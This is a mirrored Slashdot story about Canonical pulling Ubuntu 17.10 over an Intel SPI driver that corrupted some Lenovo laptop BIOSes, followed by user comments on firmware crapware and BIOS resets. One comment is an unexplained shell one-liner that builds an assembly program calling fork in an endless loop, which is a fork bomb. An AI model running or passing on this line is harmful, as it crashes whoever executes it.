Slashdot Mirror
Ubuntu 17.10 Temporarily Pulled Due To A BIOS Corrupting Problem (phoronix.com)
An anonymous reader writes: Canonical has temporarily pulled the download links for Ubuntu 17.10 "Artful Aardvark" from the Ubuntu website due to ongoing reports of some laptops finding their BIOS corrupted after installing this latest Ubuntu release. The issue is appearing most frequently with Lenovo laptops but there are also reports of issues with other laptop vendors as well. This issue appears to stem from the Intel SPI driver in the 17.10's Linux 4.13 kernel corrupting the BIOS for a select number of laptop motherboards. Canonical is aware of this issue and is planning to disable the Intel SPI drivers in their kernel builds. Canonical's hardware enablement team has already verified this works around the problem, but doesn't provide any benefit if your BIOS is already corrupted.
I have a Lenovo Yoga which I dual boot with Linux Mint Sarah and just after I installed 1709 Fall Creators Update the fingerprint reader stopped working. I gave up trying to remedy it and reset Windows, but that didn't fix it.
I then realised that it wasn't shutting down properly either. ACPI shutdown in both OSs would leave it halted but powered on, so the only way to restart was to hold the power button to kill it, and then switch on.
I finally checked the warranty and saw it was 14 months old so took it apart, removed the battery and motherboard battery, left it for an hour, powered it on, flattened the partition table an reinstalled. Works perfectly again, but after a huge amount of time wasted.
So, it's either a coincidence, or there's something modern OSs are trying to do which screw up BIOSs.
Lenovo need to stop people writing the Bios because otherwise they'd able to remove the crapware Lenovo put in the Bios to stop people removing the crapware they put in the Windows by installing a fresh Windows image.
With an unmodified Lenovo Bios the crapware will be re-installed via Windows Platform Binary Table
https://www.howtogeek.com/2263...
Beginning with Windows 8, a PC manufacturer can embed a program - a Windows .exe file, essentially - in the PC's UEFI firmware. This is stored in the "Windows Platform Binary Table" (WPBT) section of the UEFI firmware. Whenever Windows boots, it looks at the UEFI firmware for this program, copies it from the firmware to the operating system drive, and runs it. Windows itself provides no way to stop this from happening. If the manufacturer's UEFI firmware offers it up, Windows will run it without question.
Were it not for this Bios resetting feature - a ludicrously determined user could do the following
1) Remove Windows
2) Use some other OS to dump the Bios out
3) Hack said dump to mess up the Windows Platform Binary Table and reflash it
4) Reinstall Windows from an image
And then they'd have a copy of Windows with no Lenovo Service Engine installed! The horror! Instead it seems like Lenovo have had the Bios reset itself to stop step 3), so the determined user would still have LSE installed.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
Fanciful theory however Occam's razor principle strongly suggests this being a simple bug in the Bios implementation rather then malicious intent. Lenovo is on the hook for the motherboard replacement required to fix the locked Bios for any device that is still under warranty. Seems like an incredibly stupid thing to do just to stop people from being able to remove the Lenovo Server Engine